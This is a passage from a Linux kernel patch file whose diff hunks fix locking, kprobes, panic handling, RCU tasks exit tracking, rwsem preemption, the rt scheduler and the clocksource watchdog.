++ * @affinity:	Optional irq affinity mask for multiqueue devices
++ *
++ * Allocate IRQ numbers and initialized all data structures to support
++ * hierarchy IRQ domains.
++ * Parameter @realloc is mainly to support legacy IRQs.
++ * Returns error code or allocated IRQ number
++ *
++ * The whole process to setup an IRQ has been split into two steps.
++ * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
++ * descriptor and required hardware resources. The second step,
++ * irq_domain_activate_irq(), is to program the hardware with preallocated
++ * resources. In this way, it's easier to rollback when failing to
++ * allocate resources.
++ */
++int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
++			    unsigned int nr_irqs, int node, void *arg,
++			    bool realloc, const struct irq_affinity_desc *affinity)
++{
++	int ret;
++
++	if (domain == NULL) {
++		domain = irq_default_domain;
++		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
++			return -EINVAL;
++	}
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_alloc_irqs_locked(domain, irq_base, nr_irqs, node, arg,
++					   realloc, affinity);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(__irq_domain_alloc_irqs);
+ 
+ /* The irq_data was moved, fix the revmap to refer to the new location */
+@@ -1865,6 +1933,13 @@ void irq_domain_set_info(struct irq_domain *domain, unsigned int virq,
+ 	irq_set_handler_data(virq, handler_data);
+ }
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
++{
++	return -EINVAL;
++}
++
+ static void irq_domain_check_hierarchy(struct irq_domain *domain)
+ {
+ }
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 1c18ecf9f98b1..00e177de91ccd 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -458,7 +458,7 @@ static inline int kprobe_optready(struct kprobe *p)
+ }
+ 
+ /* Return true if the kprobe is disarmed. Note: p must be on hash list */
+-static inline bool kprobe_disarmed(struct kprobe *p)
++bool kprobe_disarmed(struct kprobe *p)
+ {
+ 	struct optimized_kprobe *op;
+ 
+@@ -555,17 +555,15 @@ static void do_unoptimize_kprobes(void)
+ 	/* See comment in do_optimize_kprobes() */
+ 	lockdep_assert_cpus_held();
+ 
+-	/* Unoptimization must be done anytime */
+-	if (list_empty(&unoptimizing_list))
+-		return;
++	if (!list_empty(&unoptimizing_list))
++		arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+ 
+-	arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+-	/* Loop on 'freeing_list' for disarming */
++	/* Loop on 'freeing_list' for disarming and removing from kprobe hash list */
+ 	list_for_each_entry_safe(op, tmp, &freeing_list, list) {
+ 		/* Switching from detour code to origin */
+ 		op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+-		/* Disarm probes if marked disabled */
+-		if (kprobe_disabled(&op->kp))
++		/* Disarm probes if marked disabled and not gone */
++		if (kprobe_disabled(&op->kp) && !kprobe_gone(&op->kp))
+ 			arch_disarm_kprobe(&op->kp);
+ 		if (kprobe_unused(&op->kp)) {
+ 			/*
+@@ -662,7 +660,7 @@ void wait_for_kprobe_optimizer(void)
+ 	mutex_unlock(&kprobe_mutex);
+ }
+ 
+-static bool optprobe_queued_unopt(struct optimized_kprobe *op)
++bool optprobe_queued_unopt(struct optimized_kprobe *op)
+ {
+ 	struct optimized_kprobe *_op;
+ 
+@@ -797,14 +795,13 @@ static void kill_optimized_kprobe(struct kprobe *p)
+ 	op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+ 
+ 	if (kprobe_unused(p)) {
+-		/* Enqueue if it is unused */
+-		list_add(&op->list, &freeing_list);
+ 		/*
+-		 * Remove unused probes from the hash list. After waiting
+-		 * for synchronization, this probe is reclaimed.
+-		 * (reclaiming is done by do_free_cleaned_kprobes().)
++		 * Unused kprobe is on unoptimizing or freeing list. We move it
++		 * to freeing_list and let the kprobe_optimizer() remove it from
++		 * the kprobe hash list and free it.
+ 		 */
+-		hlist_del_rcu(&op->kp.hlist);
++		if (optprobe_queued_unopt(op))
++			list_move(&op->list, &freeing_list);
+ 	}
+ 
+ 	/* Don't touch the code, because it is already freed. */
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index e3375bc40dadc..50d4863974e7a 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -55,6 +55,7 @@
+ #include <linux/rcupdate.h>
+ #include <linux/kprobes.h>
+ #include <linux/lockdep.h>
++#include <linux/context_tracking.h>
+ 
+ #include <asm/sections.h>
+ 
+@@ -6555,6 +6556,7 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ {
+ 	struct task_struct *curr = current;
+ 	int dl = READ_ONCE(debug_locks);
++	bool rcu = warn_rcu_enter();
+ 
+ 	/* Note: the following can be executed concurrently, so be careful. */
+ 	pr_warn("\n");
+@@ -6595,5 +6597,6 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ 	lockdep_print_held_locks(curr);
+ 	pr_warn("\nstack backtrace:\n");
+ 	dump_stack();
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL_GPL(lockdep_rcu_suspicious);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 44873594de031..84d5b649b95fe 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -624,18 +624,16 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 			 */
+ 			if (first->handoff_set && (waiter != first))
+ 				return false;
+-
+-			/*
+-			 * First waiter can inherit a previously set handoff
+-			 * bit and spin on rwsem if lock acquisition fails.
+-			 */
+-			if (waiter == first)
+-				waiter->handoff_set = true;
+ 		}
+ 
+ 		new = count;
+ 
+ 		if (count & RWSEM_LOCK_MASK) {
++			/*
++			 * A waiter (first or not) can set the handoff bit
++			 * if it is an RT task or wait in the wait queue
++			 * for too long.
++			 */
+ 			if (has_handoff || (!rt_task(waiter->task) &&
+ 					    !time_after(jiffies, waiter->timeout)))
+ 				return false;
+@@ -651,11 +649,12 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 	} while (!atomic_long_try_cmpxchg_acquire(&sem->count, &count, new));
+ 
+ 	/*
+-	 * We have either acquired the lock with handoff bit cleared or
+-	 * set the handoff bit.
++	 * We have either acquired the lock with handoff bit cleared or set
++	 * the handoff bit. Only the first waiter can have its handoff_set
++	 * set here to enable optimistic spinning in slowpath loop.
+ 	 */
+ 	if (new & RWSEM_FLAG_HANDOFF) {
+-		waiter->handoff_set = true;
++		first->handoff_set = true;
+ 		lockevent_inc(rwsem_wlock_handoff);
+ 		return false;
+ 	}
+@@ -1092,7 +1091,7 @@ queue:
+ 			/* Ordered by sem->wait_lock against rwsem_mark_wake(). */
+ 			break;
+ 		}
+-		schedule();
++		schedule_preempt_disabled();
+ 		lockevent_inc(rwsem_sleep_reader);
+ 	}
+ 
+@@ -1254,14 +1253,20 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+  */
+ static inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
++	int ret = 0;
+ 	long count;
+ 
++	preempt_disable();
+ 	if (!rwsem_read_trylock(sem, &count)) {
+-		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state)))
+-			return -EINTR;
++		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state))) {
++			ret = -EINTR;
++			goto out;
++		}
+ 		DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 	}
+-	return 0;
++out:
++	preempt_enable();
++	return ret;
+ }
+ 
+ static inline void __down_read(struct rw_semaphore *sem)
+@@ -1281,19 +1286,23 @@ static inline int __down_read_killable(struct rw_semaphore *sem)
+ 
+ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ {
++	int ret = 0;
+ 	long tmp;
+ 
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 
++	preempt_disable();
+ 	tmp = atomic_long_read(&sem->count);
+ 	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
+ 		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
+ 						    tmp + RWSEM_READER_BIAS)) {
+ 			rwsem_set_reader_owned(sem);
+-			return 1;
++			ret = 1;
++			break;
+ 		}
+ 	}
+-	return 0;
++	preempt_enable();
++	return ret;
+ }
+ 
+ /*
+@@ -1335,6 +1344,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 	DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 
++	preempt_disable();
+ 	rwsem_clear_reader_owned(sem);
+ 	tmp = atomic_long_add_return_release(-RWSEM_READER_BIAS, &sem->count);
+ 	DEBUG_RWSEMS_WARN_ON(tmp < 0, sem);
+@@ -1343,6 +1353,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 		clear_nonspinnable(sem);
+ 		rwsem_wake(sem);
+ 	}
++	preempt_enable();
+ }
+ 
+ /*
+@@ -1662,6 +1673,12 @@ void down_read_non_owner(struct rw_semaphore *sem)
+ {
+ 	might_sleep();
+ 	__down_read(sem);
++	/*
++	 * The owner value for a reader-owned lock is mostly for debugging
++	 * purpose only and is not critical to the correct functioning of
++	 * rwsem. So it is perfectly fine to set it in a preempt-enabled
++	 * context here.
++	 */
+ 	__rwsem_set_reader_owned(sem, NULL);
+ }
+ EXPORT_SYMBOL(down_read_non_owner);
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 7834c9854e026..ca5452afb456d 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -33,6 +33,7 @@
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
+ #include <linux/sysfs.h>
++#include <linux/context_tracking.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -210,9 +211,6 @@ static void panic_print_sys_info(bool console_flush)
+ 		return;
+ 	}
+ 
+-	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
+-		trigger_all_cpu_backtrace();
+-
+ 	if (panic_print & PANIC_PRINT_TASK_INFO)
+ 		show_state();
+ 
+@@ -242,6 +240,30 @@ void check_panic_on_warn(const char *origin)
+ 		      origin, limit);
+ }
+ 
++/*
++ * Helper that triggers the NMI backtrace (if set in panic_print)
++ * and then performs the secondary CPUs shutdown - we cannot have
++ * the NMI backtrace after the CPUs are off!
++ */
++static void panic_other_cpus_shutdown(bool crash_kexec)
++{
++	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
++		trigger_all_cpu_backtrace();
++
++	/*
++	 * Note that smp_send_stop() is the usual SMP shutdown function,
++	 * which unfortunately may not be hardened to work in a panic
++	 * situation. If we want to do crash dump after notifier calls
++	 * and kmsg_dump, we will need architecture dependent extra
++	 * bits in addition to stopping other CPUs, hence we rely on
++	 * crash_smp_send_stop() for that.
++	 */
++	if (!crash_kexec)
++		smp_send_stop();
++	else
++		crash_smp_send_stop();
++}
++
+ /**
+  *	panic - halt the system
+  *	@fmt: The text string to print
+@@ -332,23 +354,10 @@ void panic(const char *fmt, ...)
+ 	 *
+ 	 * Bypass the panic_cpu check and call __crash_kexec directly.
+ 	 */
+-	if (!_crash_kexec_post_notifiers) {
++	if (!_crash_kexec_post_notifiers)
+ 		__crash_kexec(NULL);
+ 
+-		/*
+-		 * Note smp_send_stop is the usual smp shutdown function, which
+-		 * unfortunately means it may not be hardened to work in a
+-		 * panic situation.
+-		 */
+-		smp_send_stop();
+-	} else {
+-		/*
+-		 * If we want to do crash dump after notifier calls and
+-		 * kmsg_dump, we will need architecture dependent extra
+-		 * works in addition to stopping other CPUs.
+-		 */
+-		crash_smp_send_stop();
+-	}
++	panic_other_cpus_shutdown(_crash_kexec_post_notifiers);
+ 
+ 	/*
+ 	 * Run any panic handlers, including those that might need to
+@@ -678,6 +687,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 		       const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	struct warn_args args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -692,11 +702,13 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	va_start(args.args, fmt);
+ 	__warn(file, line, __builtin_return_address(0), taint, NULL, &args);
+ 	va_end(args.args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(warn_slowpath_fmt);
+ #else
+ void __warn_printk(const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	va_list args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -704,6 +716,7 @@ void __warn_printk(const char *fmt, ...)
+ 	va_start(args, fmt);
+ 	vprintk(fmt, args);
+ 	va_end(args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(__warn_printk);
+ #endif
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index f4f8cb0435b45..fc21c5d5fd5de 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -244,7 +244,24 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if (pid_ns->pid_allocated == init_pids)
+ 			break;
++		/*
++		 * Release tasks_rcu_exit_srcu to avoid following deadlock:
++		 *
++		 * 1) TASK A unshare(CLONE_NEWPID)
++		 * 2) TASK A fork() twice -> TASK B (child reaper for new ns)
++		 *    and TASK C
++		 * 3) TASK B exits, kills TASK C, waits for TASK A to reap it
++		 * 4) TASK A calls synchronize_rcu_tasks()
++		 *                   -> synchronize_srcu(tasks_rcu_exit_srcu)
++		 * 5) *DEADLOCK*
++		 *
++		 * It is considered safe to release tasks_rcu_exit_srcu here
++		 * because we assume the current task can not be concurrently
++		 * reaped at this point.
++		 */
++		exit_tasks_rcu_stop();
+ 		schedule();
++		exit_tasks_rcu_start();
+ 	}
+ 	__set_current_state(TASK_RUNNING);
+ 
+diff --git a/kernel/power/energy_model.c b/kernel/power/energy_model.c
+index f82111837b8d1..7b44f5b89fa15 100644
+--- a/kernel/power/energy_model.c
++++ b/kernel/power/energy_model.c
+@@ -87,10 +87,7 @@ static void em_debug_create_pd(struct device *dev)
+ 
+ static void em_debug_remove_pd(struct device *dev)
+ {
+-	struct dentry *debug_dir;
+-
+-	debug_dir = debugfs_lookup(dev_name(dev), rootdir);
+-	debugfs_remove_recursive(debug_dir);
++	debugfs_lookup_and_remove(dev_name(dev), rootdir);
+ }
+ 
+ static int __init em_debug_init(void)
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 1c304fec89c02..4db36d543be37 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -663,7 +663,7 @@ static void srcu_gp_start(struct srcu_struct *ssp)
+ 	int state;
+ 
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = this_cpu_ptr(ssp->sda);
+ 	lockdep_assert_held(&ACCESS_PRIVATE(ssp, lock));
+@@ -774,7 +774,8 @@ static void srcu_gp_end(struct srcu_struct *ssp)
+ 	/* Initiate callback invocation as needed. */
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_BARRIER) {
+-		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, 0), cbdelay);
++		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, get_boot_cpu_id()),
++					cbdelay);
+ 	} else {
+ 		idx = rcu_seq_ctr(gpseq) % ARRAY_SIZE(snp->srcu_have_cbs);
+ 		srcu_for_each_node_breadth_first(ssp, snp) {
+@@ -1093,7 +1094,7 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	idx = srcu_read_lock(ssp);
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_CALL)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = raw_cpu_ptr(ssp->sda);
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+@@ -1429,7 +1430,7 @@ void srcu_barrier(struct srcu_struct *ssp)
+ 
+ 	idx = srcu_read_lock(ssp);
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, 0));
++		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda,	get_boot_cpu_id()));
+ 	else
+ 		for_each_possible_cpu(cpu)
+ 			srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, cpu));
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index f5bf6fb430dab..c8409601fec38 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -384,6 +384,7 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ {
+ 	int cpu;
+ 	unsigned long flags;
++	bool gpdone = poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq);
+ 	long n;
+ 	long ncbs = 0;
+ 	long ncbsnz = 0;
+@@ -425,21 +426,23 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ 			WRITE_ONCE(rtp->percpu_enqueue_shift, order_base_2(nr_cpu_ids));
+ 			smp_store_release(&rtp->percpu_enqueue_lim, 1);
+ 			rtp->percpu_dequeue_gpseq = get_state_synchronize_rcu();
++			gpdone = false;
+ 			pr_info("Starting switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+-	if (rcu_task_cb_adjust && !ncbsnz &&
+-	    poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq)) {
++	if (rcu_task_cb_adjust && !ncbsnz && gpdone) {
+ 		raw_spin_lock_irqsave(&rtp->cbs_gbl_lock, flags);
+ 		if (rtp->percpu_enqueue_lim < rtp->percpu_dequeue_lim) {
+ 			WRITE_ONCE(rtp->percpu_dequeue_lim, 1);
+ 			pr_info("Completing switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+-		for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
+-			struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
++		if (rtp->percpu_dequeue_lim == 1) {
++			for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
++				struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
+ 
+-			WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++				WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++			}
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+@@ -560,8 +563,9 @@ static int __noreturn rcu_tasks_kthread(void *arg)
+ static void synchronize_rcu_tasks_generic(struct rcu_tasks *rtp)
+ {
+ 	/* Complain if the scheduler has not started.  */
+-	WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
+-			 "synchronize_rcu_tasks called too soon");
++	if (WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
++			 "synchronize_%s() called too soon", rtp->name))
++		return;
+ 
+ 	// If the grace-period kthread is running, use it.
+ 	if (READ_ONCE(rtp->kthread_ptr)) {
+@@ -827,11 +831,21 @@ static void rcu_tasks_pertask(struct task_struct *t, struct list_head *hop)
+ static void rcu_tasks_postscan(struct list_head *hop)
+ {
+ 	/*
+-	 * Wait for tasks that are in the process of exiting.  This
+-	 * does only part of the job, ensuring that all tasks that were
+-	 * previously exiting reach the point where they have disabled
+-	 * preemption, allowing the later synchronize_rcu() to finish
+-	 * the job.
++	 * Exiting tasks may escape the tasklist scan. Those are vulnerable
++	 * until their final schedule() with TASK_DEAD state. To cope with
++	 * this, divide the fragile exit path part in two intersecting
++	 * read side critical sections:
++	 *
++	 * 1) An _SRCU_ read side starting before calling exit_notify(),
++	 *    which may remove the task from the tasklist, and ending after
++	 *    the final preempt_disable() call in do_exit().
++	 *
++	 * 2) An _RCU_ read side starting with the final preempt_disable()
++	 *    call in do_exit() and ending with the final call to schedule()
++	 *    with TASK_DEAD state.
++	 *
++	 * This handles the part 1). And postgp will handle part 2) with a
++	 * call to synchronize_rcu().
+ 	 */
+ 	synchronize_srcu(&tasks_rcu_exit_srcu);
+ }
+@@ -898,7 +912,10 @@ static void rcu_tasks_postgp(struct rcu_tasks *rtp)
+ 	 *
+ 	 * In addition, this synchronize_rcu() waits for exiting tasks
+ 	 * to complete their final preempt_disable() region of execution,
+-	 * cleaning up after the synchronize_srcu() above.
++	 * cleaning up after synchronize_srcu(&tasks_rcu_exit_srcu),
++	 * enforcing the whole region before tasklist removal until
++	 * the final schedule() with TASK_DEAD state to be an RCU TASKS
++	 * read side critical section.
+ 	 */
+ 	synchronize_rcu();
+ }
+@@ -988,27 +1005,42 @@ void show_rcu_tasks_classic_gp_kthread(void)
+ EXPORT_SYMBOL_GPL(show_rcu_tasks_classic_gp_kthread);
+ #endif // !defined(CONFIG_TINY_RCU)
+ 
+-/* Do the srcu_read_lock() for the above synchronize_srcu().  */
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
+ void exit_tasks_rcu_start(void) __acquires(&tasks_rcu_exit_srcu)
+ {
+-	preempt_disable();
+ 	current->rcu_tasks_idx = __srcu_read_lock(&tasks_rcu_exit_srcu);
+-	preempt_enable();
+ }
+ 
+-/* Do the srcu_read_unlock() for the above synchronize_srcu().  */
+-void exit_tasks_rcu_finish(void) __releases(&tasks_rcu_exit_srcu)
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_stop(void) __releases(&tasks_rcu_exit_srcu)
+ {
+ 	struct task_struct *t = current;
+ 
+-	preempt_disable();
+ 	__srcu_read_unlock(&tasks_rcu_exit_srcu, t->rcu_tasks_idx);
+-	preempt_enable();
+-	exit_tasks_rcu_finish_trace(t);
++}
++
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_finish(void)
++{
++	exit_tasks_rcu_stop();
++	exit_tasks_rcu_finish_trace(current);
+ }
+ 
+ #else /* #ifdef CONFIG_TASKS_RCU */
+ void exit_tasks_rcu_start(void) { }
++void exit_tasks_rcu_stop(void) { }
+ void exit_tasks_rcu_finish(void) { exit_tasks_rcu_finish_trace(current); }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU */
+ 
+@@ -1036,9 +1068,6 @@ static void rcu_tasks_be_rude(struct work_struct *work)
+ // Wait for one rude RCU-tasks grace period.
+ static void rcu_tasks_rude_wait_gp(struct rcu_tasks *rtp)
+ {
+-	if (num_online_cpus() <= 1)
+-		return;	// Fastpath for only one CPU.
+-
+ 	rtp->n_ipis += cpumask_weight(cpu_online_mask);
+ 	schedule_on_each_cpu(rcu_tasks_be_rude);
+ }
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 18e9b4cd78ef8..60732264a7d0b 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -667,7 +667,9 @@ static void synchronize_rcu_expedited_wait(void)
+ 				mask = leaf_node_cpu_bit(rnp, cpu);
+ 				if (!(READ_ONCE(rnp->expmask) & mask))
+ 					continue;
++				preempt_disable(); // For smp_processor_id() in dump_cpu_task().
+ 				dump_cpu_task(cpu);
++				preempt_enable();
+ 			}
+ 		}
+ 		jiffies_stall = 3 * rcu_exp_jiffies_till_stall_check() + 3;
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 4c5e80b92f2f4..1aeeededdd4c8 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1345,20 +1345,6 @@ retry:
+ 			continue;
+ 		}
+ 
+-		/*
+-		 * All memory regions added from memory-hotplug path have the
+-		 * flag IORESOURCE_SYSTEM_RAM. If the resource does not have
+-		 * this flag, we know that we are dealing with a resource coming
+-		 * from HMM/devm. HMM/devm use another mechanism to add/release
+-		 * a resource. This goes via devm_request_mem_region and
+-		 * devm_release_mem_region.
+-		 * HMM/devm take care to release their resources when they want,
+-		 * so if we are dealing with them, let us just back off here.
+-		 */
+-		if (!(res->flags & IORESOURCE_SYSRAM)) {
+-			break;
+-		}
+-
+ 		if (!(res->flags & IORESOURCE_MEM))
+ 			break;
+ 
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index ed2a47e4ddaec..0a11f44adee57 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -1777,6 +1777,8 @@ static struct sched_rt_entity *pick_next_rt_entity(struct rt_rq *rt_rq)
+ 	BUG_ON(idx >= MAX_RT_PRIO);
+ 
+ 	queue = array->queue + idx;
++	if (SCHED_WARN_ON(list_empty(queue)))
++		return NULL;
+ 	next = list_entry(queue->next, struct sched_rt_entity, run_list);
+ 
+ 	return next;
+@@ -1789,7 +1791,8 @@ static struct task_struct *_pick_next_task_rt(struct rq *rq)
+ 
+ 	do {
+ 		rt_se = pick_next_rt_entity(rt_rq);
+-		BUG_ON(!rt_se);
++		if (unlikely(!rt_se))
++			return NULL;
+ 		rt_rq = group_rt_rq(rt_se);
+ 	} while (rt_rq);
+ 
+diff --git a/kernel/sched/wait.c b/kernel/sched/wait.c
+index 9860bb9a847cf..133b74730738b 100644
+--- a/kernel/sched/wait.c
++++ b/kernel/sched/wait.c
+@@ -121,11 +121,12 @@ static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
+ 	return nr_exclusive;
+ }
+ 
+-static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int mode,
++static int __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int mode,
+ 			int nr_exclusive, int wake_flags, void *key)
+ {
+ 	unsigned long flags;
+ 	wait_queue_entry_t bookmark;
++	int remaining = nr_exclusive;
+ 
+ 	bookmark.flags = 0;
+ 	bookmark.private = NULL;
+@@ -134,10 +135,12 @@ static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int
+ 
+ 	do {
+ 		spin_lock_irqsave(&wq_head->lock, flags);
+-		nr_exclusive = __wake_up_common(wq_head, mode, nr_exclusive,
++		remaining = __wake_up_common(wq_head, mode, remaining,
+ 						wake_flags, key, &bookmark);
+ 		spin_unlock_irqrestore(&wq_head->lock, flags);
+ 	} while (bookmark.flags & WQ_FLAG_BOOKMARK);
++
++	return nr_exclusive - remaining;
+ }
+ 
+ /**
+@@ -147,13 +150,14 @@ static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int
+  * @nr_exclusive: how many wake-one or wake-many threads to wake up
+  * @key: is directly passed to the wakeup function
+  *
+- * If this function wakes up a task, it executes a full memory barrier before
+- * accessing the task state.
++ * If this function wakes up a task, it executes a full memory barrier
++ * before accessing the task state.  Returns the number of exclusive
++ * tasks that were awaken.
+  */
+-void __wake_up(struct wait_queue_head *wq_head, unsigned int mode,
+-			int nr_exclusive, void *key)
++int __wake_up(struct wait_queue_head *wq_head, unsigned int mode,
++	      int nr_exclusive, void *key)
+ {
+-	__wake_up_common_lock(wq_head, mode, nr_exclusive, 0, key);
++	return __wake_up_common_lock(wq_head, mode, nr_exclusive, 0, key);
+ }
+ EXPORT_SYMBOL(__wake_up);
+ 
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 8058bec87acee..1c90e710d537f 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -384,6 +384,15 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ }
+ EXPORT_SYMBOL_GPL(clocksource_verify_percpu);
+ 
++static inline void clocksource_reset_watchdog(void)
++{
++	struct clocksource *cs;
++
++	list_for_each_entry(cs, &watchdog_list, wd_list)
++		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
++}
++
++
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
+@@ -391,6 +400,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
++	unsigned long extra_wait = 0;
+ 	u32 md;
+ 
+ 	spin_lock(&watchdog_lock);
+@@ -410,13 +420,30 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 
+ 		read_ret = cs_watchdog_read(cs, &csnow, &wdnow);
+ 
+-		if (read_ret != WD_READ_SUCCESS) {
+-			if (read_ret == WD_READ_UNSTABLE)
+-				/* Clock readout unreliable, so give it up. */
+-				__clocksource_unstable(cs);
++		if (read_ret == WD_READ_UNSTABLE) {
++			/* Clock readout unreliable, so give it up. */
++			__clocksource_unstable(cs);
+ 			continue;
+ 		}
+ 
++		/*
++		 * When WD_READ_SKIP is returned, it means the system is likely
++		 * under very heavy load, where the latency of reading
